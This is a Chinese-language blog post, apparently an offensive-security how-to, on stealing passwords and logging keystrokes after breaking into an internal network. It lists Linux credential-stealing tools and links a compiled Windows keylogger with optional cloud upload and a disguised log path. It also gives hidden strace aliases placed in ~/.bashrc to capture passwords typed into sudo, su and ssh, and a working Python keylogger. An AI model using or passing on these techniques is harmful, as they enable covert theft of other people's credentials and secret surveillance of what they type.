内网信息搜集密码读取和键盘记录

录三个我常用的简单的键盘记录和密码读取操作,windows 的密码读取就不多说了,毕竟都很熟悉,主要是 linux 方面,当然还有很多其他的姿势,比如:

工具简介
mimipenguinlinux 读密码,类似于 mimikatz,需要 root 权限
Impost3rImpost3r 是一个利用 C 语言编写,用来窃取 linux 下各类密码(ssh, su, sudo)的工具
swap_diggerswap_digger 是一个 bash 脚本,用于自动化 Linux 交换分析以进行后期利用或取证。它自动进行交换提取和搜索 Linux 用户凭据、Web 表单凭据、Web 表单电子邮件、HTTP 基本身份验证、WiFi SSID 和密钥等
tcpdump抓取数据包进行分析,获取明文账号密码,比如 ftp、telnet、http

keylogger

项目地址:https://github.com/uknowsec/keylogger

windows 已编译下载地址:https://oss.zjun.info/file/keylogger.exe

可以支持通过传入 Aliyun Access Key 实现定时回传,但是会有泄露风险,直接不加任何参数运行键盘记录数据保存在目标本地即可。

保存数据路径:

C:\Users\<USERNAME>\AppData\Local\Packages\Microsoft.Messaging\360se_dump.tmp

strace

strace 一般是 Linux 自带的命令,是一个可用于诊断、调试和教学的 Linux 用户空间跟踪器。我们用它来监控用户空间进程和内核的交互,比如系统调用、信号传递、进程状态变更等。可以用此命令来记录密码输入

设置环境变量如在 ~/.bashrc 下添加以下三条 alias,sudo、su、ssh 一般是用得比较多的可以获取密码的点

alias sudo='strace -f -e trace=read,write -o /var/tmp/.sudo-`date +'%Y-%m-%d+%H:%m:%S'`.log -s 32 sudo'
alias su='strace -f -e trace=read,write -o /var/tmp/.su-`date +'%Y-%m-%d+%H:%m:%S'`.log -s 32 su'
alias ssh='strace -f -e trace=read,write -o /var/tmp/.ssh-`date +'%Y-%m-%d+%H:%m:%S'`.log -s 32 ssh'

重新加载添加了环境变量的 ~/.bashrc 文件

source ~/.bashrc

python

一个 python 的小脚本,需要桌面环境,mac 也可以使用,但是 mac 需要先添加安全与隐私

import logging
from pynput.keyboard import Listener

logging.basicConfig(filename="/tmp/log.txt", level=logging.DEBUG, format="%(asctime)s: %(message)s")

def on_press(key):
    logging.info(key)

with Listener(on_press=on_press) as listener:
    listener.join()
修改链接格式
加载评论